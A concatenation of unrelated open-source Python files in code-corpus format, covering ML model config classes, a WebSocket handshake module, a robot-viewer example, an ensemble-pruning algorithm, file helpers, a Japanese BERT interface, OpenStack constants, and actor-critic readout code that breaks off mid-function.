# If not given, all classes are supposed to have weight one.
# The “balanced” mode uses the values of y to automatically adjust weights
# inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
class_weight: Union[str, None, Dict[str, float]] = "balanced"
# {‘newton-cg’, ‘lbfgs’, ‘liblinear’, ‘sag’, ‘saga’}
# Algorithm to use in the optimization problem.
# For small datasets, ‘liblinear’ is a good choice, whereas ‘sag’ and ‘saga’ are faster for large ones.
solver: str = 'sag'
# Maximum number of iterations taken for the solvers to converge.
max_iter: int = 1000
# multi_class{‘auto’, ‘ovr’, ‘multinomial’} =’auto’
multi_class: str = 'ovr'
# For the liblinear and lbfgs solvers set verbose to any positive number for verbosity.
verbose: int = 0
# The seed of the pseudo random number generator to use when shuffling the data.
# If int, random_state is the seed used by the random number generator
# If None, the random number generator is the RandomState instance used
# by np.random. Used when solver == ‘sag’ or ‘liblinear’.
random_state: int = None
# Number of CPU cores used when parallelizing over classes if multi_class =’ovr’”. T
n_jobs: int = None
# The Elastic-Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio: Optional[float] = None
class LinearSVMConfig(MLModelConfig):
# dict or ‘balanced’ or None, default="balanced"
# Weights associated with classes in the form {class_label: weight}.
# If not given, all classes are supposed to have weight one.
# The “balanced” mode uses the values of y to automatically adjust weights
# inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
class_weight: Union[str, None, Dict[str, float]] = "balanced"
# The penalty (aka regularization term) to be used. Defaults to ‘l2’ which is the standard regularizer for linear
# SVM models. ‘l1’ and ‘elasticnet’ might bring sparsity to the model (feature selection) not achievable with ‘l2’.
penalty: str = 'l2'
# Constant that multiplies the regularization term. Defaults to 0.0001.
# Also used to compute learning_rate when set to ‘optimal’.
alpha: float = 0.0001
# The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1. l1_ratio = 0 corresponds to
# L2 penalty, l1_ratio = 1 to L1. Defaults to 0.15.
l1_ratio: float = 0.15
# Whether the intercept should be estimated or not. If False, the data is assumed to be already centered.
fit_intercept: bool = True
# The maximum number of passes over the training data(aka epochs).
# It only impacts the behavior in the fit method, and not the partial_fit method.
max_iter: int = 1000
# The stopping criterion. If it is not None, the iterations will stop when(loss > best_loss - tol)
# for n_iter_no_change consecutive epochs.
tolfloat = 1e-3
# Whether or not the training data should be shuffled after each epoch.
shufflebool = True
# The verbosity level.
verboseint = 0
# The number of CPUs to use to do the OVA(One Versus All, for multi-class problems) computation. None means 1
# unless in a joblib.parallel_backend context. -1 means using all processors. See Glossary for more details.
n_jobs: int = None
# The seed of the pseudo random number generator to use when shuffling the data. If int, random_state is the
# seed used by the random number generator
# If RandomState instance, random_state is the random number generator
# If None, the random number generator is the RandomState instance used by np.random.
random_state: Optional[int] = None
# Number of iterations with no improvement to wait before early stopping.
n_iter_no_change: int = 5
|
tools/third_party/pywebsocket3/mod_pywebsocket/handshake/__init__.py | spao234/wpt | 575 | 12750838 | <filename>tools/third_party/pywebsocket3/mod_pywebsocket/handshake/__init__.py
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket opening handshake processor. This class try to apply available
opening handshake processors for each protocol version until a connection is
successfully established.
"""
from __future__ import absolute_import
import logging
from mod_pywebsocket import common
from mod_pywebsocket.handshake import hybi
# Export AbortedByUserException, HandshakeException, and VersionException
# symbol from this module.
from mod_pywebsocket.handshake._base import AbortedByUserException
from mod_pywebsocket.handshake._base import HandshakeException
from mod_pywebsocket.handshake._base import VersionException
_LOGGER = logging.getLogger(__name__)
def do_handshake(request, dispatcher):
"""Performs WebSocket handshake.
Args:
request: mod_python request.
dispatcher: Dispatcher (dispatch.Dispatcher).
Handshaker will add attributes such as ws_resource in performing
handshake.
"""
_LOGGER.debug('Client\'s opening handshake resource: %r', request.uri)
# To print mimetools.Message as escaped one-line string, we converts
# headers_in to dict object. Without conversion, if we use %r, it just
# prints the type and address, and if we use %s, it prints the original
# header string as multiple lines.
#
# Both mimetools.Message and MpTable_Type of mod_python can be
# converted to dict.
#
# mimetools.Message.__str__ returns the original header string.
# dict(mimetools.Message object) returns the map from header names to
# header values. While MpTable_Type doesn't have such __str__ but just
# __repr__ which formats itself as well as dictionary object.
_LOGGER.debug('Client\'s opening handshake headers: %r',
dict(request.headers_in))
handshakers = []
handshakers.append(('RFC 6455', hybi.Handshaker(request, dispatcher)))
for name, handshaker in handshakers:
_LOGGER.debug('Trying protocol version %s', name)
try:
handshaker.do_handshake()
_LOGGER.info('Established (%s protocol)', name)
return
except HandshakeException as e:
_LOGGER.debug(
'Failed to complete opening handshake as %s protocol: %r',
name, e)
if e.status:
raise e
except AbortedByUserException as e:
raise
except VersionException as e:
raise
# TODO(toyoshim): Add a test to cover the case all handshakers fail.
raise HandshakeException(
'Failed to complete opening handshake for all available protocols',
status=common.HTTP_STATUS_BAD_REQUEST)
# vi:sts=4 sw=4 et
|
examples/gepetto-viewer.py | Sreevis/pinocchio | 716 | 12750857 | # NOTE: this example needs gepetto-gui to be installed
# usage: launch gepetto-gui and then run this test
import pinocchio as pin
import numpy as np
import sys
import os
from os.path import dirname, join, abspath
from pinocchio.visualize import GepettoVisualizer
# Load the URDF model.
# Conversion with str seems to be necessary when executing this file with ipython
pinocchio_model_dir = join(dirname(dirname(str(abspath(__file__)))),"models")
model_path = join(pinocchio_model_dir,"example-robot-data/robots")
mesh_dir = pinocchio_model_dir
urdf_filename = "talos_reduced.urdf"
urdf_model_path = join(join(model_path,"talos_data/robots"),urdf_filename)
model, collision_model, visual_model = pin.buildModelsFromUrdf(urdf_model_path, mesh_dir, pin.JointModelFreeFlyer())
viz = GepettoVisualizer(model, collision_model, visual_model)
# Initialize the viewer.
try:
viz.initViewer()
except ImportError as err:
print("Error while initializing the viewer. It seems you should install gepetto-viewer")
print(err)
sys.exit(0)
try:
viz.loadViewerModel("pinocchio")
except AttributeError as err:
print("Error while loading the viewer model. It seems you should start gepetto-viewer")
print(err)
sys.exit(0)
# Display a robot configuration.
q0 = pin.neutral(model)
viz.display(q0)
# Display another robot.
viz2 = GepettoVisualizer(model, collision_model, visual_model)
viz2.initViewer(viz.viewer)
viz2.loadViewerModel(rootNodeName = "pinocchio2")
q = q0.copy()
q[1] = 1.0
viz2.display(q)
|
deslib/util/dfp.py | vishalbelsare/DESlib | 310 | 12750884 | <filename>deslib/util/dfp.py
"""Implementation of the Dynamic Frienemy Pruning (DFP) algorithm for online
pruning of base classifiers.
References
----------
<NAME>., <NAME>. and <NAME>., Online Pruning
of Base Classifiers for Dynamic Ensemble Selection,
Pattern Recognition, vol. 72, December 2017, pp 44-58.
Cruz, <NAME>, <NAME>, <NAME>, and <NAME>.
"FIRE-DES++: Enhanced online pruning of base classifiers for dynamic ensemble
selection." Pattern Recognition 85 (2019): 149-160.
"""
# coding=utf-8
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
import numpy as np
from sklearn.neighbors import KNeighborsClassifier
def frienemy_pruning(X_query, X_dsel, y_dsel, ensemble, k):
"""Implements the Online Pruning method (frienemy) which prunes base
classifiers that do not cross the region of competence of a given instance.
A classifier crosses the region of competence if it correctly
classify at least one sample for each different class in the region.
Parameters
----------
X_query : array-like of shape (n_samples, n_features)
Test set.
X_dsel : array-like of shape (n_samples, n_features)
Dynamic selection set.
y_dsel : array-like of shape (n_samples,)
The target values (Dynamic selection set).
ensemble : list of shape = [n_classifiers]
The ensemble of classifiers to be pruned.
k : int
Number of neighbors used to compute the regions of competence.
Returns
-------
DFP_mask : array-like of shape = [n_samples, n_classifiers]
Mask containing 1 for the selected base classifier and 0
otherwise.
"""
predictions = np.zeros((X_dsel.shape[0], len(ensemble)),
dtype=np.intp)
for index, clf in enumerate(ensemble):
predictions[:, index] = clf.predict(X_dsel)
hit_miss = predictions == y_dsel[:, np.newaxis]
competence_region = KNeighborsClassifier(n_neighbors=k).fit(X_dsel, y_dsel)
neighbors = competence_region.kneighbors(X_query, return_distance=False)
return frienemy_pruning_preprocessed(neighbors, y_dsel, hit_miss)
def frienemy_pruning_preprocessed(neighbors, y_val, hit_miss):
"""Implements the Online Pruning method (frienemy) which prunes base
classifiers that do not cross the region of competence of a given instance.
A classifier crosses the region of competence if it correctly
classify at least one sample for each different class in the region.
Notes
-----
This implementation assumes the regions of competence of each query example
(neighbors) and the predictions for the dynamic selection data (hit_miss)
were already pre-computed.
Parameters
----------
neighbors : array-like of shape (n_samples, n_neighbors)
Indices of the k nearest neighbors.
y_val : array-like of shape (n_samples,)
The target values (class labels).
hit_miss : array-like of shape (n_samples, n_classifiers)
Matrix containing 1 when the base classifier made the correct
prediction, 0 otherwise.
Returns
-------
DFP_mask : array-like of shape = [n_samples, n_classifiers]
Mask containing 1 for the selected base classifier and 0
otherwise.
"""
if neighbors.ndim < 2:
neighbors = neighbors.reshape(1, -1)
n_samples = neighbors.shape[0]
n_classifiers = hit_miss.shape[1]
dfp_mask = np.zeros((n_samples, n_classifiers))
# TODO: vectorize this code?
for sample_idx in range(n_samples):
curr_neighbors = neighbors[sample_idx]
neighbors_y = y_val[curr_neighbors]
if len(set(neighbors_y)) > 1:
# Indecision region. Check if the base classifier predict the
# correct label for a sample belonging to each class.
for clf_index in range(n_classifiers):
[mask] = np.where(hit_miss[curr_neighbors, clf_index])
if len(set(neighbors_y[mask])) > 1:
dfp_mask[sample_idx, clf_index] = 1.0
else:
# Safe region.
dfp_mask[sample_idx, :] = 1.0
# rows that all classifiers were pruned are set to 1.0
dfp_mask[np.all(dfp_mask == 0, axis=1)] = 1.0
return dfp_mask
|
src/hg/makeDb/genbank/src/lib/py/genbank/fileOps.py | andypohl/kent | 171 | 12750893 | """Miscellaneous file operations"""
import os,os.path,errno
def ensureDir(dir):
"""Ensure that a directory exists, creating it (and parents) if needed."""
try:
os.makedirs(dir)
except OSError, e:
if e.errno != errno.EEXIST:
raise e
def ensureFileDir(fname):
"""Ensure that the directory for a file exists, creating it (and parents) if needed.
Returns the directory path"""
dir = os.path.dirname(fname)
if len(dir) > 0:
ensureDir(dir)
return dir
else:
return "."
def prLine(fh, *objs):
"write each str(obj) followed by a newline"
for o in objs:
fh.write(str(o))
fh.write("\n")
def prStrs(fh, *objs):
"write each str(obj), with no newline"
for o in objs:
fh.write(str(o))
def prRow(fh, row):
"""Print a row (list or tupe) to a tab file.
Does string conversion on each columns"""
first = True
for col in row:
if not first:
fh.write("\t")
fh.write(str(col))
first = False
fh.write("\n")
def prRowv(fh, *objs):
"""Print a row from each argument to a tab file.
Does string conversion on each columns"""
first = True
for col in objs:
if not first:
fh.write("\t")
fh.write(str(col))
first = False
fh.write("\n")
|
pororo/models/brainbert/JaBERTa.py | jayten42/pororo | 1,137 | 12750906 | <gh_stars>1000+
# Copyright (c) Facebook, Inc., its affiliates and Kakao Brain. All Rights Reserved
from typing import Dict, Union
import torch
from fairseq.models.roberta import RobertaModel
from fairseq.models.roberta.hub_interface import RobertaHubInterface
from transformers import BertJapaneseTokenizer
from pororo.models.brainbert.utils import softmax
from pororo.tasks.utils.download_utils import download_or_load
class JabertaModel(RobertaModel):
@classmethod
def load_model(cls, model_name: str, lang: str, **kwargs):
"""
Load pre-trained model as RobertaHubInterface.
:param model_name: model name from available_models
:return: pre-trained model
"""
from fairseq import hub_utils
ckpt_dir = download_or_load(model_name, lang)
x = hub_utils.from_pretrained(
ckpt_dir,
"model.pt",
load_checkpoint_heads=True,
**kwargs,
)
return JabertaHubInterface(x["args"], x["task"], x["models"][0])
class JabertaHubInterface(RobertaHubInterface):
def __init__(self, args, task, model):
super().__init__(args, task, model)
try:
import ipadic # noqa
except ImportError:
raise ImportError(
"Please install ipadic with: `pip install ipadic`")
try:
import fugashi # noqa
except ImportError:
raise ImportError(
"Please install fugashi with: `pip install fugashi`")
self.bpe = BertJapaneseTokenizer.from_pretrained(
"cl-tohoku/bert-base-japanese-whole-word-masking")
def tokenize(self, sentence: str, add_special_tokens: bool = False):
result = " ".join(self.bpe.tokenize(sentence)[:510])
if add_special_tokens:
result = f"<s> {result} </s>"
return result
def encode(
self,
sentence: str,
*addl_sentences,
add_special_tokens: bool = True,
no_separator: bool = False,
return_bpe: bool = False,
) -> torch.LongTensor:
bpe_sentence = self.tokenize(
sentence,
add_special_tokens=add_special_tokens,
)
for s in addl_sentences:
bpe_sentence += " </s>" if not no_separator and add_special_tokens else ""
bpe_sentence += (" " + self.tokenize(s, add_special_tokens=False) +
" </s>" if add_special_tokens else "")
tokens = self.task.source_dictionary.encode_line(
bpe_sentence,
append_eos=False,
add_if_not_exist=False,
)
if return_bpe:
return tokens.long(), bpe_sentence.split()[1:-1]
return tokens.long()
def fill_mask(self, masked_input: str, topk: int = 5):
masked_token = "__"
assert (
masked_token in masked_input and
masked_input.count(masked_token) == 1
), "Please add one {0} token for the input, eg: 'He is a {0} guy'".format(
masked_token)
text_spans = masked_input.split(masked_token)
text_spans_bpe = ((" {0} ".format("<mask>")).join([
" ".join(self.bpe.tokenize(text_span.rstrip()))
for text_span in text_spans
]).strip())
tokens = self.task.source_dictionary.encode_line(
"<s> " + text_spans_bpe + " </s>",
append_eos=False,
add_if_not_exist=False,
)
masked_index = torch.nonzero(
tokens == self.task.mask_idx,
as_tuple=False,
)
if tokens.dim() == 1:
tokens = tokens.unsqueeze(0)
with torch.no_grad():
features, _ = self.model(
tokens.long().to(device=self.device),
features_only=False,
return_all_hiddens=False,
)
logits = features[0, masked_index, :].squeeze()
prob = logits.softmax(dim=0)
_, index = prob.topk(k=topk, dim=0)
topk_predicted_token_bpe = self.task.source_dictionary.string(index)
return [
bpe.replace("##", "") for bpe in topk_predicted_token_bpe.split()
]
@torch.no_grad()
def predict_output(
self,
sentence: str,
*addl_sentences,
add_special_tokens: bool = True,
no_separator: bool = False,
show_probs: bool = False,
) -> Union[str, Dict]:
assert (
"sentence_classification_head" in self.model.classification_heads
), "need pre-trained sentence_classification_head to make predictions"
tokens = self.encode(
sentence,
*addl_sentences,
add_special_tokens=add_special_tokens,
no_separator=no_separator,
)
with torch.no_grad():
prediction = self.predict(
"sentence_classification_head",
tokens,
return_logits=self.args.regression_target,
)
if self.args.regression_target:
return prediction.item() # float
label_fn = lambda label: self.task.label_dictionary.string(
[label + self.task.label_dictionary.nspecial])
if show_probs:
probs = softmax(prediction.cpu().numpy())
probs = probs.tolist()
probs = {label_fn(i): prob for i, prob in enumerate(probs)}
return probs
return label_fn(prediction.argmax().item()) # str
@torch.no_grad()
def predict_tags(self, sentence: str, no_separator: bool = False):
label_fn = lambda label: self.task.label_dictionary.string([label])
tokens, words = self.encode(
sentence,
no_separator=no_separator,
return_bpe=True,
)
# Get first batch and ignore <s> & </s> tokens
preds = (self.predict(
"sequence_tagging_head",
tokens,
)[0, 1:-1, :].argmax(dim=1).cpu().numpy())
labels = [
label_fn(int(pred) + self.task.label_dictionary.nspecial)
for pred in preds
]
return [(word, label) for word, label in zip(words, labels)]
|
neutron/plugins/common/constants.py | congnt95/neutron | 1,080 | 12750912 | # Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.plugins import constants as p_const
# Maps extension alias to service type that
# can be implemented by the core plugin.
EXT_TO_SERVICE_MAPPING = {
'fwaas': p_const.FIREWALL,
'vpnaas': p_const.VPN,
'metering': p_const.METERING,
'router': p_const.L3,
'qos': p_const.QOS,
}
# Maps default service plugins entry points to their extension aliases
DEFAULT_SERVICE_PLUGINS = {
'auto_allocate': 'auto-allocated-topology',
'tag': 'tag',
'timestamp': 'timestamp',
'network_ip_availability': 'network-ip-availability',
'flavors': 'flavors',
'revisions': 'revisions',
}
|
lvsr/bricks/readouts.py | Fatman003/Actor | 178 | 12750913 | import logging
import theano
from theano.gradient import disconnected_grad
from theano import tensor
from blocks.graph import ComputationGraph
from blocks.filter import VariableFilter
from blocks.bricks import Linear, NDimensionalSoftmax
from blocks.bricks.base import application
from blocks.roles import OUTPUT, add_role, WEIGHT
from blocks.utils import dict_subset, shared_floatx_nans
from blocks_extras.bricks.sequence_generator2 import SoftmaxReadout, MergeReadout
logger = logging.getLogger(__name__)
class ReinforceReadout(SoftmaxReadout):
def __init__(self, reward_brick, entropy=None, **kwargs):
super(ReinforceReadout, self).__init__(**kwargs)
self.reward_brick = reward_brick
self.entropy_coof = entropy
self.value_prediction = Linear(output_dim=1, name='value_prediction')
self.children += [
reward_brick, self.value_prediction]
self.costs.inputs += ['attended', 'attended_mask']
def _push_allocation_config(self):
super(ReinforceReadout, self)._push_allocation_config()
self.value_prediction.input_dim = self.get_dim('states')
@application
def costs(self, application_call, prediction, prediction_mask,
groundtruth, groundtruth_mask,
**inputs):
states = disconnected_grad(inputs['states'])
merged = self.merge(**dict_subset(inputs, self.merge_names))
# Compute log-probabilities for the predicted tokens
log_probs = -self.all_scores(prediction, merged) * prediction_mask
# Compute per-token rewards
rewards = self.reward_brick.apply(prediction, prediction_mask,
groundtruth, groundtruth_mask).sum(axis=-1)
# Encourage entropy by adding negated log-probs to the rewards
application_call.add_auxiliary_variable(log_probs, name='log_probs')
if self.entropy_coof:
rewards += self.entropy_coof * disconnected_grad(-log_probs)
future_rewards = rewards[::-1].cumsum(axis=0)[::-1]
baselines = self.value_prediction.apply(states)[:, :, 0]
application_call.add_auxiliary_variable(
baselines, name='baselines')
# Compute baseline error
centered_future_rewards = future_rewards - baselines
baseline_errors = (
(centered_future_rewards *
disconnected_grad(prediction_mask)) ** 2).sum(axis=0)
application_call.add_auxiliary_variable(
baseline_errors, name='baseline_errors')
# The gradient of this will be the REINFORCE 1-sample
# gradient estimate
costs = (disconnected_grad(centered_future_rewards)
* log_probs
* prediction_mask).sum(axis=0)
# Add auxiliary variables for intermediate steps of the computation
application_call.add_auxiliary_variable(
rewards, name='rewards')
application_call.add_auxiliary_variable(
log_probs.copy(), name='prediction_log_probs')
return costs
class CriticReadout(MergeReadout):
def __init__(self, num_tokens,
value_softmax=False, same_value_for_wrong=False,
groundtruth_word_bonus=False, dueling_outputs=False, **kwargs):
self.value_softmax = value_softmax
self.same_value_for_wrong = same_value_for_wrong
self.groundtruth_word_bonus = groundtruth_word_bonus
self.dueling_outputs = dueling_outputs
super(CriticReadout, self).__init__(post_merge_dim=num_tokens, **kwargs)
self.costs.inputs = ([
'prediction', 'prediction_mask',
'groundtruth', 'groundtruth_mask']
+ self.input_names)
def _allocate(self):
w = shared_floatx_nans((self.get_dim('states'),), name='add_weights')
add_role(w, WEIGHT)
self.parameters.append(w)
def _initialize(self):
self.weights_init.initialize(self.parameters[0], self.rng)
# For compatibility with Blocks-extras
def sample(self):
raise NotImplementedError()
# For compatibility with Blocks-extras
def scores(self):
pass
@application
def costs(self, prediction, prediction_mask,
groundtruth, groundtruth_mask, **inputs):
outputs = self.all_outputs(groundtruth, groundtruth_mask, **inputs)
# It does not matter what we return here, as long as it contains
# the values in the computation graph.
return outputs.sum()
@application
def all_outputs(self, application_call, groundtruth, groundtruth_mask, **inputs):
outputs = self.merge(**dict_subset(inputs, self.merge_names))
indices = tensor.repeat(
tensor.arange(groundtruth.shape[1]), groundtruth.shape[0])
if self.value_softmax:
logger.debug('Applying value softmax')
outputs = (tensor.addbroadcast(outputs[:, :, :1], 2)
+ self.softmax.apply(outputs[:, :, 1:], extra_ndim=1))
if self.same_value_for_wrong:
logger.debug('Same value for apriori wrong actions')
wrong_output = outputs[:, :, 0]
outputs = outputs[:, :, 1:]
wrong_mask = tensor.ones_like(outputs[0])
wrong_mask = tensor.set_subtensor(
wrong_mask[indices, groundtruth.T.flatten()], 0)
outputs = (outputs * (1 - wrong_mask)
+ wrong_output[:, :, None] * wrong_mask)
application_call.add_auxiliary_variable(wrong_mask, name='wrong_mask')
if self.groundtruth_word_bonus:
logger.debug('Bonus for grondtruth words')
wrong_mask = tensor.ones_like(outputs[0])
wrong_mask = tensor.set_subtensor(
wrong_mask[indices, groundtruth.T.flatten()], 0)
w, = self.parameters
bonuses = inputs['states'].dot(w)
outputs += bonuses[:, :, None] * (1 - wrong_mask)[None, :, :]
if self.dueling_outputs:
logger.debug('Dueling outputs a-la dueling networks')
base_output = outputs[:, :, [0]]
dueling_outputs = outputs[:, :, 1:]
outputs = base_output + dueling_outputs - dueling_outputs.mean(axis=2, keepdims=True)
return outputs
@application
def outputs(self, groundtruth, groundtruth_mask, **inputs):
# Copy-pasted from all_outputs, because Theano does not support ellipsis
outputs = self.merge(**dict_subset(inputs, self.merge_names))
indices = tensor.repeat(
tensor.arange(groundtruth.shape[1]), groundtruth.shape[0])
if self.value_softmax:
logger.debug('Applying value softmax')
outputs = (tensor.addbroadcast(outputs[:, :1], 1)
+ self.softmax.apply(outputs[:, 1:]))
if self.same_value_for_wrong:
logger.debug('Same value for apriori wrong actions')
wrong_output = outputs[:, 0]
outputs = outputs[:, 1:]
wrong_mask = tensor.ones_like(outputs)
wrong_mask = tensor.set_subtensor(
wrong_mask[indices, groundtruth.T.flatten()], 0)
outputs = (outputs * (1 - wrong_mask)
+ wrong_output[:, None] * wrong_mask)
if self.groundtruth_word_bonus:
logger.debug('Bonus for grondtruth words')
wrong_mask = tensor.ones_like(outputs)
wrong_mask = tensor.set_subtensor(
wrong_mask[indices, groundtruth.T.flatten()], 0)
w, = self.parameters
bonuses = inputs['states'].dot(w)
outputs = outputs + bonuses[:, None] * (1 - wrong_mask)
if self.dueling_outputs:
logger.debug('Dueling outputs a-la dueling networks')
base_output = outputs[:, [0]]
dueling_outputs = outputs[:, 1:]
outputs = base_output + dueling_outputs - dueling_outputs.mean(axis=1, keepdims=True)
return outputs
class ActorCriticReadout(SoftmaxReadout):
"""Actor-critic
Params
------
bos_token : int
The token used to pad critic input. Critic needs to do
at least one extra step compared to the actor in order
to get the first glimpse of the ground-truth sequence
before predicting the actual values.
"""
def __init__(self, reward_brick,
compute_targets, solve_bellman,
freeze_actor, freeze_critic, critic_uses_actor_states,
critic_uses_groundtruth,
critic=None, critic_burnin_steps=None,
critic_loss=None,
critic_policy_t=None,
entropy_reward_coof=None, cross_entropy_reward_coof=None,
trpo_coef=None,
discount=None,
value_penalty=None, value_penalty_type=None,
accumulate_outputs=False, use_value_biases=None,
actor_grad_estimate=None,
bos_token=None,
**kwargs):
super(ActorCriticReadout, self).__init__(**kwargs)
self.reward_brick = reward_brick
self.critic = critic
self.freeze_actor = freeze_actor
self.freeze_critic = freeze_critic
self.critic_uses_actor_states = critic_uses_actor_states
self.critic_uses_groundtruth = (
critic_uses_groundtruth if critic_uses_groundtruth is not None else True)
self.critic_burnin_steps = (
critic_burnin_steps if critic_burnin_steps is not None else 0)
self.critic_loss = (
critic_loss if critic_loss is not None else "L2")
self.value_summand = Linear(output_dim=1, name='summand')
self.softmax_t = 1.
self.critic_policy_t = (
critic_policy_t if critic_policy_t is not None else 1.0)
self.epsilon = 0.
self.discount = (
discount if discount is not None else 1.)
self.entropy_reward_coof = (
entropy_reward_coof if entropy_reward_coof is not None else 0.)
self.cross_entropy_reward_coof = (
cross_entropy_reward_coof if cross_entropy_reward_coof is not None else 0.)
self.trpo_coef = (
trpo_coef if trpo_coef is not None else 0.)
self.value_penalty = value_penalty
self.value_penalty_type = (
value_penalty_type if value_penalty_type is not None else "L2")
self.compute_targets = compute_targets
self.solve_bellman = solve_bellman
self.accumulate_outputs = accumulate_outputs
self.use_value_biases = (
use_value_biases if use_value_biases is not None else True)
self.actor_grad_estimate = (
actor_grad_estimate if actor_grad_estimate else 'all_actions')
self.bos_token = bos_token
self.softmax = NDimensionalSoftmax()
self.children += [reward_brick, self.value_summand, self.softmax]
if self.critic:
self.children.append(self.critic)
self.costs.inputs += ['attended', 'attended_mask']
def _push_allocation_config(self):
super(ActorCriticReadout, self)._push_allocation_config()
self.value_summand.input_dim = self.get_dim('attended')
@application
def scores(self, **inputs):
merged = self.merge(**dict_subset(inputs, self.merge_names))
return self.softmax.log_probabilities(
merged * self.softmax_t, extra_ndim=merged.ndim - 2)
@application
def costs(self, application_call, prediction, prediction_mask,
groundtruth, groundtruth_mask,
**inputs):
def _prediction_subtensor(data):
if data.ndim != 3:
raise ValueError
flat_data = data.reshape((
data.shape[0] * data.shape[1],
data.shape[2]))
flat_data = flat_data[
tensor.arange(flat_data.shape[0]), prediction.flatten()]
return flat_data.reshape((
prediction.shape[0], prediction.shape[1]))
attended = disconnected_grad(inputs.pop('attended'))
attended_mask = disconnected_grad(inputs.pop('attended_mask'))
# Compute the rewards
rewards = self.reward_brick.apply(
prediction, prediction_mask,
groundtruth, groundtruth_mask)[:, :, 0]
future_rewards = rewards[::-1].cumsum(axis=0)[::-1]
# Compute the critic outputs
if self.critic:
padding = tensor.repeat(
tensor.fill(prediction[0:1], self.bos_token), 1, axis=0)
mask_padding = tensor.repeat(
tensor.fill(prediction_mask[0:1], 1.), 1, axis=0)
padded_prediction = tensor.concatenate([padding, prediction])
padded_prediction_mask = tensor.concatenate([mask_padding, prediction_mask])
if self.critic_uses_groundtruth:
critic_context = groundtruth
critic_context_mask = groundtruth_mask
else:
critic_context = tensor.zeros_like(groundtruth[0:1])
critic_context_mask = tensor.zeros_like(groundtruth_mask[0:1])
critic_kwargs = dict(
prediction=padded_prediction, prediction_mask=padded_prediction_mask,
groundtruth=critic_context, groundtruth_mask=critic_context_mask,
inputs=critic_context, inputs_mask=critic_context_mask)
if self.critic_uses_actor_states:
extra_inputs = disconnected_grad(inputs['states'])
# We don't need the very last hidden state of the actor
# in extra_inputs. We have to add something instead for the shapes
# to match. It doesn't matter at all, what exactly we add.
critic_kwargs['extra_inputs'] = tensor.concatenate(
[extra_inputs, tensor.zeros_like(extra_inputs[0:1])])
critic_cg = ComputationGraph(self.critic.costs(**critic_kwargs))
outputs, = VariableFilter(
applications=[self.critic.generator.readout.all_outputs],
roles=[OUTPUT])(critic_cg)
# The first subtensor should be discarded, because it was outputted
# for the padding. In addition to that Q-values from the first
# 'critic_burnin_steps' will be ignored, see later in the code.
outputs = outputs[1:]
else:
outputs = self.merge(**dict_subset(inputs, self.merge_names))
prediction_outputs = _prediction_subtensor(outputs)
# Compute Q adjustments
adjustments = outputs
prediction_adjustments = prediction_outputs
if self.accumulate_outputs:
prediction_adjustments = prediction_outputs.cumsum(axis=0)
adjustments = tensor.inc_subtensor(
adjustments[1:], prediction_adjustments[:-1][:, :, None])
# Compute shared additive biases for all Q values
if self.use_value_biases:
value_biases = (
self.value_summand.apply(attended)[:, :, 0]
* attended_mask).sum(axis=0)
else:
value_biases = tensor.zeros_like(adjustments[0, :, 0])
values = adjustments + value_biases[None, :, None]
prediction_values = prediction_adjustments + value_biases[None, :]
rolled_prediction_mask = tensor.roll(prediction_mask, -1, axis=0)
rolled_prediction_mask = tensor.set_subtensor(
rolled_prediction_mask[-1], 0)
# Compute probabilities
logs = self.scores(use_epsilon=False, **inputs)
probs = tensor.exp(logs)
if self.trpo_coef:
logger.debug("Using TRPO coefficient of {}".format(self.trpo_coef))
old_probs = tensor.tensor3('probs')
else:
old_probs = tensor.zeros_like(probs)
prediction_logs = _prediction_subtensor(logs)
# Compute value targets
value_targets = (disconnected_grad(probs) * values).sum(axis=-1)
value_targets = tensor.roll(value_targets, -1, axis=0)
value_targets = (self.discount * value_targets * rolled_prediction_mask
+ rewards)
value_targets = value_targets.astype(theano.config.floatX)
total_costs = 0
# Compute critic cost
if not self.compute_targets:
logger.debug("Using given targets")
value_targets = tensor.matrix('value_targets')
if self.solve_bellman == 'no':
logger.debug("Not solving Bellman, just predicting the rewards")
value_targets = rewards.copy(name='value_targets')
elif self.solve_bellman == 'without_dp':
future_rewards = rewards[::-1].cumsum(axis=0)[::-1]
logger.debug("Solving Bellman, but without DP")
value_targets = future_rewards
elif self.solve_bellman is not True:
raise ValueError()
critic_errors = prediction_values - value_targets
if self.critic_loss == 'L2':
logger.debug("L2 loss for the critic")
critic_costs_per_char = critic_errors ** 2 * prediction_mask
elif self.critic_loss == 'huber':
logger.debug("Huber loss for the critic")
